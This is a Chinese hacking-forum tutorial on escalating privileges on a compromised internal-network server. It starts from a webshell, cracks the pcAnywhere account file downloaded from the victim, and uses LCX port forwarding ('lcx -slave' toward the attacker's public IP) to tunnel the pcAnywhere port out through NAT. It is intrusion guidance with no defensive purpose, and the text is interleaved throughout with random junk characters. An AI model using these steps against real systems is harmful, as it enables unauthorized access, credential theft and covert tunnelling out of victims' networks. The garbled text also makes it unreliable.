很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。. J7 n4 d; \: @# }" z5 z
x, ]7 D- G. A' o
提权方法:pcanywhere+LCX2 _5 F) M& T/ F4 f- Q( O+ |
) v( S* Q9 L5 E, Z4 }, W
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。; v Y* \7 o& d# t [0 X# i
" V. b& p$ T. L# w' o$ t0 r0 O在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。8 m/ f4 u* q0 l) z" z' b: |
$ d6 V3 \, D% K. n, A1 s( w; m
[attach]1548[/attach] - p* ]3 i9 v; Q. A2 N, P! Z查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。 ' P. X4 A8 _# t8 S' D7 C5 v* l: ]$ f9 R
[attach]1549[/attach] ; n8 k% \ o! S/ l! M2 ?- @呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。) ~! Q1 v: W4 \& c L, ? Z4 ~
( y; P6 d# i2 e. C1 T* r) u3 o3 w[attach]1550[/attach]' l! K- n( E" V$ b0 y
. A8 ~0 {( \+ T6 o
[attach]1551[/attach] : r. o* W: W0 y; P4 e6 o由于服务器在内网,那我们就要做端口转发,又要用到LCX啦`` * f& Z; V4 m( z: K& W1 o: ?: A+ O8 S" M9 N
[attach]1552[/attach] 6 L& d6 ^/ G+ {/ [! U5 LLCX的用法再简单说下:) \" f6 f: e* K' M7 g
% ?- V0 B9 r7 B8 A1 z服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口) , o3 H- a- W8 Y+ c + j* P" l K( R& g$ o本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口) , [: i, A: E3 f: }( c - I3 q/ x8 F1 ~由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。" E* L% f. Z; K5 c/ |5 d
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``$ `9 r7 \. \; p; L6 V4 x1 d B2 p L: }
, q0 Y/ S8 W' ?* \' N
[attach]1553[/attach]4 d* n' }4 V# h, t, ?4 R